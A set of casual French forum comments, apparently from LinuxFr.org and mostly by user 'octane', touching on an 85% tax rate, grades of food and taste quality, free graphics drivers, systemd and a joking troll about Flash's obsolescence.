Et tout le monde s'arrête au taux d'imposition de 85%. Certes. Sauf que personne ne précise combien il lui reste, une fois ces 85% versés. Et ça, c'est une information que j'aimerai bien connaître afin de mieux cerner l'indécence de ce monsieur.
Donc si quelqu'un sait, qu'il fasse tourner, ça me changera des ergotages sans fin sur ces 85% ou 83, ou si c'est possible ou non, etc…
[^] # Re: Chasse aux drozoĥiles
Posté par octane . En réponse au sondage Machines à café. Évalué à 3.
J'ai habité pendant 2 ans à côté d'un boulanger patissier chocolatier qui a été meilleur ouvrier de france et qui a eu pas mal d'autres prix. C'est incomparable. Je retourne encore quelque fois chez lui. Et oui, lorsque je vais prendre mon menu sandwich/boisson/dessert à la boulangerie à côté du boulot je regarde d'un air dédaigneux les gâteaux.
Pour moi, il y a quatre niveau:
Le crado, qu'à peu près tout le monde trouve dégueulasse d'un commun accord.
Le moyen, que tout le monde peut manger sans trop se poser de question.
Le bon, qui fait bien plaisir quand le mange/boit.
L'excellent, que seuls des amateurs éclairés vont savoir apprécier. Typiquement le vin d'une année spéciale. Certains vont s'en souvenir toute leur vie, pour d'autre ça sera "bon sans plus" ou "indifférent".
La différence entre le bon et l'excellent va varier grandement entre les individus. Par exemple, lorsqu'on boit trois cafés par semaine, on comprend pas pourquoi certains dépensent de l'argent dans une machine, un mode de filtration, un grain particulier.
Par exemple, je ne comprends pas trop les buveurs de vins (ouais, c'est bon, mais au delà de 6-8 euros la bouteille c'est du snobisme selon moi), mais je suis pour ma part extrêmement sensible aux eaux (j'arrive assez facilement à reconnaître une dizaine d'eaux minérales en aveugle). Et je suis toujours prêt à goûter des eaux de source ou de fontaine, et j'ai des gros souvenirs là dessus.
Tout ça pour dire que les goûts et les couleurs ça dépend des gens, il y en a même qui trouvent gnome3 joli, et d'autres qui discutent des heures sur la liberté d'une license.
# il manque une option
Posté par octane . En réponse au sondage Les pilotes de ma carte graphique sont.... Évalué à 6.
[X] libre j'ai pas réfléchi, j'ai pensé que ça serait mieux
Pour faire du code et naviguer sur le web en écoutant du mp3, honnêtement, je n'ai pas cherché plus loin que le pilote libre, et je ne suis même pas sûr de vouloir savoir ce que j'ai en modèle.
[^] # Re: systemd
Posté par octane . En réponse au journal Les big balls de gentoo. Évalué à 3.
Il y avait un piège, ce n'est pas systemd :-)
[^] # Re: Dispersion
Posté par octane . En réponse au journal Un nouveau lecteur Flash libre : Shumway. Évalué à 7.
Pareil
Surtout que flash[1], c'est fini avec le refus d'apple[2] de l'intégrer à ses iDevices[3] ce en quoi il a trop eu raison[4]. Donc pourquoi chercher à créer un lecteur d'un format obsolète[5]? Peut-être qu'en 2017, lorsque flash ne sera plus utilisé que dans des coins d'archive.org[6] on pourra faire des jeux à 2 balles et regarder des vidéos de chatons[7].
[1] troll level spotted!
[2] troll increasing 125%
[3] Critical HIT!
[4] Overflow, overflow!
[5] Red zone! Entering red zone, Stahp!
[6] Core temperature near explosion!
[7] A new troll has spawned
# et la twibioune?
Posté par octane . En réponse au sondage Vers quelle partie du site LinuxFr.org allez‐vous en premier ?. Évalué à 10.
Et le repaire bien connu des moules de bouchots, la fameuse twibioune?